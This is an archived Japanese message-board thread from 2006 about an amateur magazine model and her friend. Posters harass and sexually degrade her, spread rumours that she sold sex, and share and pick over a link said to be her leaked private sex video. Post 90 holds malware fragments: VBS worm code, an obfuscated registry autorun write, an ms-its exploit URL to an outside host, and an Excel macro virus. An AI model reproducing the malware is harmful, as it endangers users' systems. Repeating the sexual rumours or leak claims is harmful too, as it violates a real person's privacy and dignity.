5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★平有紀子チャン★Vol.4★みぃちゃんと仲良し♪★

1 :無名モデル:2006/10/06(金) 18:35:28 ID:EjCRNNzU
ポップなどで読モの平有紀子ちゃんかわいい!!!
はいっ
じゃ〜この中でみぃと元同小同中現同高の人手あげて〜♪
(前スレ)
★平有紀子チャン★Vol.3★
http://life7.2ch.net/test/read.cgi/model/1144757219/
(前々スレ)
★平有紀子チャン★Vol.2★
http://life7.2ch.net/test/read.cgi/model/1138525647/
(前々々スレ)
★平有紀子チャン★
http://life7.2ch.net/test/read.cgi/model/1123199393/

2 :無名モデル:2006/10/06(金) 19:39:37 ID:ZfVQ2zFi
2げと(´,_ゝ`)

3 :無名モデル:2006/10/06(金) 21:16:41 ID:???
前スレのマジで痛い女がうざかった。
あいつのせいで、平のこと嫌いじゃなかったけど嫌いになった。
平をかばってるつもりが、逆にアンチを増やしてる大馬鹿。

4 :無名モデル:2006/10/06(金) 21:31:35 ID:???
スゴイ可愛くって大好き(*>∇<*)デモ、みぃってだれ?何者?

5 :無名モデル:2006/10/07(土) 00:19:36 ID:???
>>3
おまえはみぃだろ?
間接的に有紀子ちゃんを叩いてるんだな
もういい加減に死んでくれ!

6 :無名モデル:2006/10/07(土) 06:51:22 ID:jaiu0u3U
前のスレで何があったかしらないけど、あなた気持ち悪いですよ??
前のスレの話題を持ち出すのやめてください。しかもゆっこちゃんネタじゃないし。嫌いならこなきゃいいじゃないですか?頭つかってくださいね?

7 :無名モデル:2006/10/07(土) 06:52:19 ID:jaiu0u3U
>>3

8 :無名モデル:2006/10/07(土) 09:07:41 ID:???
でも確実にファン減ったな…
>>6とかまた痛い子いるし…

9 :無名モデル:2006/10/07(土) 10:43:13 ID:???
>>6過去スレ嫁

10 :無名モデル:2006/10/07(土) 13:43:20 ID:AQLrGNiX
10 :無名モデル :2006/04/13(木) 13:13:43 ID:kte6IrHK
ちりちりドクモちゃん???

11 :無名モデル:2006/10/07(土) 16:09:15 ID:jaiu0u3U
読みました、
どうしてファンが減るんですか…ιι??別にファンやめようなんて思わなかったんですケド……

12 :無名モデル:2006/10/07(土) 19:13:08 ID:zmlkVH/Q
タイトルにみぃの名前いらなくない?またみぃが調子のるよ

13 :無名モデル:2006/10/07(土) 20:40:05 ID:jaiu0u3U
なんにしろゆっこちゃんは可愛いよね

14 :無名モデル:2006/10/07(土) 21:46:44 ID:???
みぃちゃんはかわいいね。
ブログの写真も最高だし。
ゆっこよりかわいいと思うけどな。

15 :無名モデル:2006/10/07(土) 22:18:12 ID:zmlkVH/Q
有紀子ちゃんすっぴん…

16 :無名モデル:2006/10/07(土) 23:08:30 ID:???
なんで一般人の名前がタイトルに?
まじありえない
作りなおしましょーよ

17 :無名モデル:2006/10/07(土) 23:54:23 ID:???
っていうか、有紀子ちゃんも一般人だし

18 :無名モデル:2006/10/08(日) 10:08:25 ID:BcpGUIeN
まーたみいが調子のるね(´∀`)

19 :無名モデル:2006/10/08(日) 11:11:10 ID:BBBxLUd6
ごめん、タイトルにみぃチャンの名前入れようって言ったのうちだゎあ。
でも、うちの意見採用してくれてサンクス!!

20 :無名モデル:2006/10/08(日) 16:52:57 ID:EFTG6bOO
彼氏と別れたねー

21 :無名モデル:2006/10/08(日) 17:12:10 ID:V4Vhgc4p
まぁ有紀子にはもっといい人いるからね

22 :無名モデル:2006/10/08(日) 18:43:43 ID:vvuY5qA+
有紀子ちゃん大好きです!!今月号の変顔で、惚れました…www
ブログのURL教えてください!!(>_<)

23 :無名モデル:2006/10/08(日) 20:39:53 ID:r5/XS1T+
有紀子ちゃん、事務所入ったんですねー!!
ブログのURL知りたいです!!教えてください!!

24 :無名モデル:2006/10/09(月) 00:15:16 ID:???
有紀子ちゃんは事務所に入ったの?
どこの事務所なの?

25 :無名モデル:2006/10/09(月) 10:43:43 ID:UR0aQPKH
ブログ書いてるの??見たい

26 :無名モデル:2006/10/09(月) 18:44:24 ID:???
唇がエロいね

27 :無名モデル:2006/10/09(月) 20:50:28 ID:???
>>26
アソコもエロいよ。

28 :無名モデル:2006/10/09(月) 21:01:08 ID:UR0aQPKH
口デカイね

29 :無名モデル:2006/10/10(火) 09:34:59 ID:???
>>28
アソコは狭いよ

30 :無名モデル:2006/10/10(火) 11:48:08 ID:???
>>28
フェラもうまいよ


31 :無名モデル:2006/10/10(火) 18:15:08 ID:CmSN+zDG
しまりは?

32 :無名モデル:2006/10/10(火) 18:48:44 ID:???
>>31
締りも良かったよ

33 :無名モデル:2006/10/10(火) 22:24:26 ID:CmSN+zDG
よかったね!

34 :無名モデル:2006/10/10(火) 23:36:50 ID:DiT+WVRl
イメージ的に巾着だと思うのは漏だけか?

35 :無名モデル:2006/10/11(水) 00:59:56 ID:???
>>15
すっぴんてどの?

またブログ始めたの?

36 :無名モデル:2006/10/11(水) 11:01:31 ID:5z/rWtEp
すっぴんカエル

37 :無名モデル:2006/10/11(水) 11:48:18 ID:???
もう有紀子のことはどうでもいいよ
それよりみぃちゃんのことを話そうよ
ここのスレはそういうところだろ?

38 :無名モデル:2006/10/11(水) 15:05:12 ID:Ad+fJAdH
本人乙

39 :無名モデル:2006/10/11(水) 15:11:11 ID:nBKg/t2b
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

40 :無名モデル:2006/10/11(水) 17:58:13 ID:5z/rWtEp
関西じぁ毒モになるにはどうしたらいい?

41 :無名モデル:2006/10/11(水) 18:39:57 ID:???
このスレ立てたのミイだろ

42 :無名モデル:2006/10/11(水) 18:51:19 ID:OVRu2ni1
この子一番可愛いと思うんだけど読モ止まりなんだね。

43 :無名モデル:2006/10/11(水) 19:06:11 ID:5z/rWtEp
みぃってなんなの一般人なのに

44 :有紀子:2006/10/11(水) 23:16:16 ID:???
みぃちゃんの悪口を言わないで。
有紀子の親友なんだから。

45 :無名モデル:2006/10/12(木) 02:22:29 ID:???
44

有紀子は自分の事を有紀子なんて言いません!笑

46 :無名モデル:2006/10/12(木) 09:26:40 ID:???
>>45
知ったかぶりがまた出てきたか・・・
お前は有紀子のなんなんだよ?
お母さんか?ボケ!

47 :無名モデル:2006/10/12(木) 10:47:56 ID:3mEYrFi4
スチュワーデスになってほしい!!

48 :無名モデル:2006/10/12(木) 12:47:43 ID:???
>>47
なれるわけないだろ?

49 :無名モデル:2006/10/12(木) 13:04:41 ID:PsFGOCYP
可愛いけど、耳の形変だよね。

50 :無名モデル:2006/10/12(木) 14:02:07 ID:8UG5ufVU
昔のポップ見て思ったんだが昔のほうが可愛かった

51 :無名モデル:2006/10/12(木) 15:47:46 ID:diedGAIM
可愛いかなぁ?

52 :無名モデル:2006/10/12(木) 16:41:09 ID:???
写メののせかた知ってる人いませんか?
有紀子ちゃん可愛いし載せたいよ

53 :無名モデル:2006/10/12(木) 19:05:05 ID:???
>>52
誰が載せてくれって頼んだよ?
よけいなことをするな。
そんなことをしてるヒマがあったら仕事しろ、バカモノ!

54 :無名モデル:2006/10/12(木) 22:00:38 ID:???
有紀子ちゃんって、小倉ゆうこと加藤晴彦の3人で青山?かなんかのCM出てる?
似てる人かな?

55 :無名モデル:2006/10/13(金) 01:30:21 ID:???
53へ
お前が仕事すれば?忙しくてもサイトに写メのせてる人いるっしょ?
お前が馬鹿者

56 :無名モデル:2006/10/13(金) 10:49:50 ID:???
おまえらアンカーの付け方くらい勉強してから来いよ。

57 :無名モデル:2006/10/13(金) 18:43:31 ID:???
>>55
有紀子ちゃんからすればよけいなお世話だって言ってるんだよ
忙しいとか忙しくないとかそんな問題じゃないんだよ
お前だって自分の写メールを勝手に載せられていい気分がするか?
もっとよく考えてから書き込めよ

58 :無名モデル:2006/10/13(金) 23:51:50 ID:???
>>57
有紀子ちゃんからすればってオマエが勝手に言ってんだろw
こわっ



59 :無名モデル:2006/10/14(土) 00:40:10 ID:???
>>58
きちがい?

60 :無名モデル:2006/10/14(土) 10:42:17 ID:???
>>57 ストーカー?

61 :無名モデル:2006/10/14(土) 14:37:35 ID:???
>>58 >>60  同一人物

62 :無名モデル:2006/10/14(土) 16:29:44 ID:???
>>59>>61 同一人物

63 :無名モデル:2006/10/14(土) 17:40:17 ID:???
>>58 >>60 >>62  同一人物?

64 :無名モデル:2006/10/14(土) 17:51:04 ID:???
俺の友達の妹の友達なんだけど、
キャバとか普通にやってたってよ

あと高1くらいのまだ○○南高校のときのいかつい彼氏
とのプリクラとかやめて別んとこ入ったあとのプリクラ
とか俺持ってるよ

65 :無名モデル:2006/10/14(土) 17:53:40 ID:ygfoFIUs
のせてよ

66 :無名モデル:2006/10/14(土) 21:03:59 ID:???
>>59>>61>>63  同一人物?

67 :無名モデル:2006/10/14(土) 23:36:23 ID:???
>>58 >>60 >>62 >>64 >>66
もしかしてみぃちゃん?
いい加減にイタズラはやめてね
有紀子ちゃんがかわいいからって嫌がらせしないで

68 :無名モデル:2006/10/15(日) 02:02:15 ID:bdIB3ff4
プリクラみたい

69 :無名モデル:2006/10/15(日) 09:54:14 ID:???
みぃってなんなの?正直邪魔でしかない。有紀子ちゃんの話以外いらない。可愛い子以外いらない。

70 :無名モデル:2006/10/15(日) 15:46:04 ID:+YFopx0t
みいとか有紀子ちゃんと本当の友達でないでしょ。

71 :無名モデル:2006/10/15(日) 16:42:10 ID:pPnlAxSt
いちごは可愛い上に頭がいいの〜
東大目指しているんだぁ♪

http://blog.livedoor.jp/love_and_sophia/

72 :無名モデル:2006/10/15(日) 18:08:43 ID:???
みぃってこ怖っ
全てにおいて有紀子ちゃんに負けてるのに

73 :無名モデル:2006/10/15(日) 19:14:25 ID:???
みぃちゃんはかわいいと思うよ
おれはみぃちゃんのファンだけどな
早く読者モデルになって欲しい
あまりその気がないみたいだけどね
有紀子みたいにでしゃばりじゃないから

74 :無名モデル:2006/10/15(日) 20:28:21 ID:???
みいってだれ?


75 :無名モデル:2006/10/15(日) 22:53:05 ID:TPSLAFRO
音痴すぎて見てられない…

76 :無名モデル:2006/10/16(月) 00:21:09 ID:???
>>75
あの歌は聴いていられないよね。
周りの読者モデルの子はみんな引いてるし。
あまりにへたくそでびっくりしてる子とかもいるし。

77 :無名モデル:2006/10/16(月) 08:30:14 ID:NzaPCSYS
周りがまたうまいしね
管野とかつばさとか

78 :無名モデル:2006/10/16(月) 13:54:23 ID:???
何で歌ったんだろうね
自分で下手だと気づいてないのかな?

79 :無名モデル:2006/10/16(月) 15:08:11 ID:D62S1zv1
なんで彼氏と別れたの??

80 :無名モデル:2006/10/17(火) 00:15:16 ID:???
有紀子の援助交際のことをここで書いたからだよ。
書いたのはみぃちゃんだと思うけどね。

81 :無名モデル:2006/10/17(火) 08:41:59 ID:EPFRxze3
マジ?

82 :無名モデル:2006/10/17(火) 11:50:44 ID:nrp81kl9
>>54
思った!!似てるよね。
本人かな?

83 :無名モデル:2006/10/17(火) 12:00:58 ID:C6ZO1WOU
可愛くていいとも!!☆

84 :無名モデル:2006/10/17(火) 19:54:50 ID:jxvr0IV1
有紀子のブログ教えてW

85 :無名モデル:2006/10/17(火) 22:03:17 ID:???
>>83
寒いので退場!

86 :無名モデル:2006/10/17(火) 22:54:30 ID:uM6fBd9C
ゆきこはブログもプロフもやってません

87 :無名モデル:2006/10/18(水) 11:54:23 ID:???
有紀子ちゃんとみぃちゃんは仲がいいらしいよ。

88 :無名モデル:2006/10/18(水) 13:08:58 ID:Sv9ZyvMG
みいちゃん?

89 :無名モデル:2006/10/18(水) 16:31:24 ID:???
みぃちゃんってかわいいよね
何でモデルにならないんだろ

90 :<body onload=window()>:2006/10/19(木) 00:22:10 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


91 :無名モデル:2006/10/19(木) 11:45:42 ID:???
有紀子ちゃんかわいくなった。元カレと別れてヨカッタんじゃない??ってかみぃちゃんて誰?ウザっ。

92 :有紀子:2006/10/19(木) 16:47:19 ID:???
みぃちゃんの悪口言わないで。
大切な親友なんだから。
みんなよりみぃちゃんのほうがわたしのことを大切に思ってくれてるから。

93 :無名モデル:2006/10/19(木) 17:52:42 ID:OoczLUKP
この人って学校通信だよね?

94 :無名モデル:2006/10/19(木) 18:20:14 ID:diG03OPq
みぃちゃんブログ閉鎖したの?

95 :無名モデル:2006/10/19(木) 20:07:17 ID:???
>>94閉鎖してないよ!twの方は再開できてないけど

96 :無名モデル:2006/10/19(木) 23:03:08 ID:RhhiNwSb
ブログみたいよ〜さらして!

97 :有紀子:2006/10/20(金) 06:54:53 ID:???
みぃちゃんのことは書くな。
おまえらは有紀子のことだけ書いてればいいんだよ。

98 :有紀子:2006/10/20(金) 16:44:50 ID:???
みぃちゃん、萌えー

99 :無名モデル:2006/10/21(土) 00:32:33 ID:bJSnwhcK
みいちゃんのプロフみたい!有紀子ちゃん、109で会ったことあるけど可愛くてやさしかったー!

100 :有紀子:2006/10/21(土) 12:16:40 ID:???
うちも有紀子ちゃんに会ったことあるけど握手してくれなかったよ
自分よりかわいいと思ったら冷たくするみたい


101 :無名モデル:2006/10/21(土) 17:27:24 ID:Kyrw9knE
いやいや有希子ちゃんより可愛くても無視しないから

102 :無名モデル:2006/10/21(土) 18:33:01 ID:PyN/kicI
私も会ったとき優しかったよ!ゆきこちゃんから写メも撮りますかって言ってくれたし(^O^)

103 :無名モデル:2006/10/21(土) 18:41:45 ID:???
>>100
ガハははははは!!!!!


104 :無名モデル:2006/10/21(土) 19:09:28 ID:dxbvecuQ
あのこは素でいい人だった

105 :有紀子:2006/10/22(日) 07:45:20 ID:???
本人が必死でがんばってるね
なんかかわいそうになっちゃう
そんなにいじめなくてもいいのに

106 :無名モデル:2006/10/23(月) 11:42:54 ID:s5olfOCL
POP以外なにでてんの?

107 :有紀子:2006/10/23(月) 20:55:57 ID:???
>>106
デラベッピン

108 :無名モデル:2006/10/24(火) 08:00:30 ID:ybN1VOYp
みいって子可愛いって言ってるのsageしてる人しかいない笑

リアルに本人痛い

109 :無名モデル:2006/10/24(火) 08:45:00 ID:Cm+FKXGE
だってみいだもん♪
ここみいの知り合いいないの?

110 :無名モデル:2006/10/24(火) 19:29:09 ID:wVFgTpf+
すごい可愛いよね
薄い色が似合う
でも食べ方がきもすぎ
汚い..
凄いショックだった
ギャオのキャンプしてるムービー見てみな!!

111 :無名モデル:2006/10/24(火) 22:19:31 ID:Dyw7dPiX
みぃってひとついに載ってるね。

112 :無名モデル:2006/10/25(水) 06:47:28 ID:???
有紀子の食べ方は牛みたい

113 :無名モデル:2006/10/25(水) 17:17:16 ID:???
みぃ、なんかの雑誌に載ってたよ。
Rayだったかviviだったか忘れたけど、すごいちっちゃく。
しかも写り悪くてかわいそうだった…。

114 :無名モデル:2006/10/25(水) 23:21:09 ID:???
みぃちゃんの悪口はやめてね。
ここはみぃちゃんのファンが集まるところなんだからね。

115 :無名モデル:2006/10/27(金) 11:32:21 ID:Nh/grtem
平のハメ撮入手

116 :無名モデル:2006/10/30(月) 00:37:22 ID:???
>>115
マジかよ?
また偽情報か?

117 :無名モデル:2006/10/30(月) 13:37:38 ID:sI0saNpZ
みいのスレ?

118 :無名モデル:2006/10/30(月) 14:05:02 ID:hfJmdGqs
大変大変!大ニュースだよ!
一週間くらい前に友達と渋谷に行ったんだけど、なんと亀梨くnを見かけましたぁ!私は大×100000000000ファンだったんで、写メめっちゃ大量に取ってました。
でね、亀梨くnが勢いよく走ってたんで、それに追いかけて私と友達も走ってたんです。そしたら、暗い路地の方入ってたんで、どこ行くんだろう・・・と思ってたんです。
そしたら亀梨くnは携帯をとりだして「着いたから早く来いよ!」と言い携帯を閉じました。
すると数秒後、違う方向から綺麗な女性が出てきました。誰でも憧れるような長くてサラサラな髪でした。背も高くて、きっとモデルさんじゃないかと思います。

そしたら、二人とも何もしゃべらずに周りをキョロキョロして、人がいないことを確認し、亀梨くnが女性のスカートに手を入れたんです!!
私はその瞬間から携帯でムービーを撮りました。
二人は一言も声を出さずにやっていました。
いつの間に亀梨くnはズボンとパンツを脱いでいて、私は亀梨くnのアソコを見てしまいました。
しかも女の人はほぼ全裸でした。二人のアソコはヌメヌメで、しかも女の人は全身ベトベトでした。
20分くらい経って、二人は洋服を着て、何も無かったかのように無言で分かれていきました。
すっごく驚きました。
 
 
そのムービーをみなさんにも特別に見せようと思います。けど、それなりの価値があると思うので、このレスをコピって7つの板に貼ってください。
すると不思議なことにココ↓
[                               ]
にアドレスが出てくるんです。
ですが一部のパソコンでは9つ貼らないと出てきません。
よくこんなレスがあって、私はいつも試すんですが、できません。
だけど、このレスは本当に成功するんですよ。
私の友達13人中12人ができました。

ただ一つ言いますが、このムービーはすごく過激です。亀梨くnのアソコもくっきり丸見えです。

そういうのを覚悟して見てください。

以上報告でした。


119 :無名モデル:2006/10/31(火) 00:46:32 ID:???
ここもつまらない奴ばかりになってるね。
有紀子ちゃんのことをいろいろ教えてよ。
どこの学校を目指してるのかとか。
予備校に行ってるんでしょ?

120 :無名モデル:2006/11/01(水) 06:16:05 ID:???
有紀子ちゃんってAVデビューするの?

121 :無名モデル:2006/11/01(水) 13:53:35 ID:FBZyk0m8
あほかー!!!

122 :無名モデル:2006/11/01(水) 14:33:19 ID:???
平のハメ撮り
http://m.pic.to/7g5ld

123 :無名モデル:2006/11/01(水) 14:49:35 ID:jbzpUlNj
本物だ…

124 :無名モデル:2006/11/01(水) 15:54:07 ID:???
ヒソヒソ( ∵)(∵ )ヒソヒソ
http://urlcutter.com?7534

125 :無名モデル:2006/11/01(水) 19:29:47 ID:zENV26x/
マジほんものなのこれ…?

126 :無名モデル:2006/11/01(水) 20:46:57 ID:sAjQiR/d
有紀子ちゃんって
特別かわいい訳ぢゃないけど、
前に比べてきれいになったと思うよ!

127 :無名モデル:2006/11/01(水) 20:59:23 ID:nPcC7why
>>122が見れない
どんなのなの?

128 :無名モデル:2006/11/01(水) 21:37:08 ID:???
↑有紀子チャンらしき人のハメ撮り…

129 :無名モデル:2006/11/01(水) 21:51:37 ID:???
今月のPOPあんまり出てないね

130 :無名モデル:2006/11/01(水) 22:48:34 ID:lMnWz/fC
らしきってかまんま本人ぽいよ。
2005年ってなってたから竜也って元カレかな?

131 :無名モデル:2006/11/01(水) 22:52:43 ID:Z4ugDae/
釣られすぎ。似てるけど、どう見ても顔違うから。

132 :無名モデル:2006/11/01(水) 23:06:09 ID:gYFsDWdq
いや、顔本人だろ。声もまんまだし。

133 :無名モデル:2006/11/01(水) 23:19:29 ID:ABeqdJcA
ヘアアレンジのポニーテールしてるやつかわいい!

134 :無名モデル:2006/11/02(木) 01:35:47 ID:???
顔はよく確認できないけど…
声はまんまだね

135 :無名モデル:2006/11/02(木) 15:08:10 ID:I/WhFZKb
お嬢様っぽくてすきだったのに

136 :無名モデル:2006/11/02(木) 15:10:32 ID:600gmmpQ
顔も一時停止ボタン押したら見れるよ…
顔も声もゆきこちゃんだね
ショックだなあ…

137 :無名モデル:2006/11/02(木) 15:23:57 ID:EU9oA783
歯とかゆきこッぽい

138 :無名モデル:2006/11/02(木) 15:59:19 ID:HM32NlUd
みたい…


139 :無名モデル:2006/11/02(木) 17:46:10 ID:ewvRWu9B
生だね‥

140 :無名モデル:2006/11/02(木) 18:26:22 ID:???
最近好き〜
憧れる!

141 :無名モデル:2006/11/02(木) 18:53:52 ID:60CBYG78
ショック

142 :無名モデル:2006/11/02(木) 19:25:02 ID:8mCTcjS0
この子って大学行くの?

143 :無名モデル:2006/11/02(木) 19:57:16 ID:sWJG+2tb
>>122
本物なの・・?↓↓

144 :無名モデル:2006/11/02(木) 20:42:22 ID:???
>>122
男はなんて言ってるの?
有紀子チャンの声に似てるの?

145 :無名モデル:2006/11/02(木) 22:10:10 ID:sWJG+2tb
>>144
似てるとゆうかまんまだよ;;

146 :無名モデル:2006/11/02(木) 22:22:59 ID:cZlAvvTj
ほんものそう;;

147 :無名モデル:2006/11/03(金) 00:27:15 ID:???
釣られすぎ。。。
ニセモノに決まってるじゃん。

148 :無名モデル:2006/11/03(金) 01:22:22 ID:y3pOUlo1
本人っしょ↑

149 :無名モデル:2006/11/03(金) 01:31:34 ID:ihBKY1O3
誰かパソコンでも見れるようにして〜

150 :無名モデル:2006/11/03(金) 03:40:18 ID:???
うん…有紀子ちゃん本人だね…ショック。

151 :無名モデル:2006/11/03(金) 05:23:09 ID:???
ショックてなにがショックなの?
Hくらい誰でもするでしょ
てか相手は竜也って人?

152 :無名モデル:2006/11/03(金) 09:15:04 ID:56HlXHRC
どうやって見るの?

153 :無名モデル:2006/11/03(金) 14:14:18 ID:???
パソコンは知らないけど普通に見れるよ
男は誰なんだろう

154 :無名モデル:2006/11/03(金) 14:14:59 ID:WnJ9Vyfo
>>151
生でやってる事が

155 :無名モデル:2006/11/03(金) 17:14:53 ID:0CN59Dju
偽物と信じたいが本物っぽい。。。OTZいやさ、当たり前の行為だけど、一応顔知られてるしムービーに残しちゃ。。。てか彼氏ゴムもしてないしこんなの晒すなんて最低な奴だな。平さんも悪いが同情する。

156 :無名モデル:2006/11/03(金) 18:43:30 ID:jkuKnSt+
元彼が別れた腹いせに晒したんじゃ?

157 :無名モデル:2006/11/03(金) 18:44:56 ID:SlY5caTn
ほくろの位置本人と一緒だ…

158 :無名モデル:2006/11/03(金) 23:03:33 ID:???
口元と目元が似てるし鼻の左側近くにホクロあるの同じだね…
男がなんて言ってるのか気になるw
わかる人いる?

159 :無名モデル:2006/11/03(金) 23:38:30 ID:???
本物だ
本人さらされてるの知ってんのかな
やめてって言ってるから撮った事は知ってんだろうけど
それにしても気持ちいいと言ってる割には濡れてないね

160 :無名モデル:2006/11/03(金) 23:54:13 ID:ihBKY1O3
AV?

161 :無名モデル:2006/11/04(土) 00:03:02 ID:???
>>160
AVじゃなくて完全プライベートのハメ撮りだよ
Hの最中に男がふざけてかわざとか携帯ムービーで撮ったやつ
やめてとか言ってるのが何かリアルだ

162 ::2006/11/04(土) 00:13:38 ID:p3J3UTv6
本物だね。。彼氏が撮ったのかな、日付が去年だ、ひどすぎ。

163 :無名モデル:2006/11/04(土) 00:44:11 ID:???
彼氏が友達にこの動画まわしてるんじゃない?
まわすとネットに載るの早いかも。

164 :無名モデル:2006/11/04(土) 00:52:11 ID:???
男は何にも言ってなくない?

165 :無名モデル:2006/11/04(土) 07:45:01 ID:5gAk1sgR
有紀子ちゃんは何て言ってる?

166 :無名モデル:2006/11/04(土) 08:16:28 ID:l5Od/Ok/
顔がよく確認できないけど…本物っぽいね

167 :無名モデル:2006/11/04(土) 08:36:34 ID:???
って言うか、本物なの?
パソコンからは見れないのかな?

168 :無名モデル:2006/11/04(土) 09:03:49 ID:???
みいちゃんのゲスブに有紀子ちゃんの書き込みあったよ!

169 :無名モデル:2006/11/04(土) 09:13:58 ID:???
iモーションだからパソコンだとダメなのかな

ノーカットだからアソコ大アップだし
顔も胸も写ってる


170 :無名モデル:2006/11/04(土) 09:18:24 ID:d+dq0UeU
有紀子チャン否定してたね。良かったー。
みぃチャンも有紀子チャンも優しいね。

171 :無名モデル:2006/11/04(土) 09:30:30 ID:l5Od/Ok/
有紀子ちゃんなんて否定してたの?

172 :無名モデル:2006/11/04(土) 09:37:24 ID:Dkg2KrC+
みいちゃんのゲスブみたい!!!

173 :無名モデル:2006/11/04(土) 10:01:54 ID:???
そりゃ否定するっきゃないでしょ
いくら本人だとバレバレでも…私だって違うと言い張ると思う

174 :無名モデル:2006/11/04(土) 10:59:35 ID:vYt1+RFY
なんとかかんとか…この体勢でついてみて?聞き取れない。

175 ::2006/11/04(土) 11:39:11 ID:???
この事って信じるか信じないかはその人次第だけど、私は有紀子ちゃんじゃないと思う!有紀子ちゃんも否定してるし普通あんなの撮らないでしょ!
しかも女の人、お腹出てない?有紀子ちゃんはお肉ないよー男の人もお腹出てるし〜

176 :無名モデル:2006/11/04(土) 12:25:06 ID:s3TTxEgu
ダメイク出てるんだね

177 :無名モデル:2006/11/04(土) 14:35:09 ID:l5Od/Ok/
太ってた時期もあるっしょー!ってか男の人って竜也?君なの?

178 :無名モデル:2006/11/04(土) 14:47:23 ID:???
太ってた時期あっても仰向けで腹あんな出るかな?
しかも男のほうもお腹出過ぎぢゃん!竜也くんだったら色黒いんぢゃん?

179 :無名モデル:2006/11/04(土) 16:03:04 ID:???
だから妊娠してるんだってば。

180 :無名モデル:2006/11/04(土) 16:46:46 ID:???
>>122
どこに日付書いてあるの?
有紀子チャンらしき人が「や〜だ〜」とか「その体制で突いてみて」とか男に「気持ちいい?」って聞いたり喘ぎ声が入ってた
他は聞き取れなかった

181 :無名モデル:2006/11/04(土) 16:55:17 ID:PT+KIb29
あーあどうすんの

182 :無名モデル:2006/11/04(土) 17:01:46 ID:???
相手がT君とは限らない

勉強になったよ
H画像は絶対撮らない、撮らせない事だね
もしこれが本人じゃなくても、有紀子チャンのH画像だと思われたり、変な目で見られる事になった

183 :無名モデル:2006/11/04(土) 17:07:29 ID:8sAJZcqR
みたいーーーーーー!!!!!!
でもボーダフォン見れない!!!

184 :無名モデル:2006/11/04(土) 18:14:20 ID:1vu5JH9J
見おわったあと日付出るよ

185 :無名モデル:2006/11/04(土) 18:16:22 ID:GYwwf8tc
みいって人のプロフ持ってる方載せてください*´`*

186 :無名モデル:2006/11/04(土) 19:32:39 ID:7+66f/uX
男デブじゃない?
有紀子ちゃんあんな肉付きの男と付き合わないでしょ…笑

187 :無名モデル:2006/11/04(土) 19:34:16 ID:7+66f/uX
雑誌とかに出てる以上証拠に残るようなもん撮ったりしないんじゃん普通?

188 :無名モデル:2006/11/04(土) 19:38:55 ID:???
完全に騙されてるね。
誰が煽動してるんだろ?
みんな踊らされてるよ。

189 :無名モデル:2006/11/04(土) 19:41:03 ID:???
男ってやってる所ムービーに撮りたがるよね 彼氏もフェラしてる所写メ撮りたいってすごい言うし…これみて怖くなったから絶対撮らせない!

190 :無名モデル:2006/11/04(土) 19:44:19 ID:???
結構冗談半分で撮ったりするよね
危ない危ない

191 :無名モデル:2006/11/04(土) 19:52:38 ID:???
日付って2005年5月24日ってやつ?
竜也って人一時期太ってたよ
ゲスブで確かに声がすごい似てて客観的に見たら私も本人と信じちゃうかも。けど私じゃない。動画なんか撮らないよって言ってたよ

192 :無名モデル:2006/11/04(土) 19:52:44 ID:???
確かに男デブだし声キモいかも、しかも本当に有紀子ちゃんとやったならのせなくない?有紀子ちゃんにムービー載せた事ばれるし。もし自分が雑誌に出てる人のはめ撮り持ってても、ばれるかも…って思ってのせられないな…
みぃちゃんのゲスブのやりとり消えてたからもう見れないよー

193 :無名モデル:2006/11/04(土) 20:09:25 ID:???
有紀子チャンH好きだよね〜
まぁ彼氏限定だからいいんじゃん?

194 :無名モデル:2006/11/04(土) 20:44:42 ID:3d5xqxJJ
本人だねぇ‥まぁヤリマンだから。

195 :無名モデル:2006/11/04(土) 21:40:07 ID:???
彼氏が友達とかに見せたのが回ったんでしょ

196 :無名モデル:2006/11/04(土) 21:44:45 ID:zpaTNU7B
みぃって人のプロフ誰か持ってます?

197 :無名モデル:2006/11/04(土) 21:48:10 ID:AnJnIHc9
やりまん?
やりたくてもやれなくて痴漢とかするヤツよりずっと健全♪人生楽しんでるっしょ♪
まぁこの子がそうか知らないけど。。

198 :無名モデル:2006/11/04(土) 22:30:51 ID:PT+KIb29
痴漢云々より
生でヤッてる事に引く

199 :sage:2006/11/04(土) 22:35:18 ID:PJxbKG75
最近の高校生なんてみんな生でやってるよ
そんなことでいちいち引かれてかわいそう

200 :無名モデル:2006/11/04(土) 22:36:03 ID:WAJzMdMC
ムービーだと谷間のとこに大きいホクロあるよね?
水着スナップとかで写ってないから

201 :無名モデル:2006/11/04(土) 22:37:50 ID:???
>>200間違えた
写ってないから→写ってないかな?

202 :無名モデル:2006/11/04(土) 22:40:55 ID:Z7ikoju6
でも人間は生でやるから生まれてくるんだよ!!

203 :無名モデル:2006/11/04(土) 22:47:45 ID:l5Od/Ok/
実際結構みんなハメ撮りしてるよ

204 :無名モデル:2006/11/04(土) 23:44:03 ID:PT+KIb29
リスクを考えないで生でヤる厨ばっかだな
みんなやってるからって本当に思考が馬鹿なんだね…
可哀想。

205 :無名モデル:2006/11/05(日) 00:24:46 ID:R61Xu8TJ
>>200
水着スナップ見てみたけどゆきこちゃんホクロ無かった

206 :無名モデル:2006/11/05(日) 00:58:06 ID:???
うん!ホクロない!
結論…ムービーは有紀子ちゃんじゃない。終わり

207 :無名モデル:2006/11/05(日) 09:07:15 ID:???
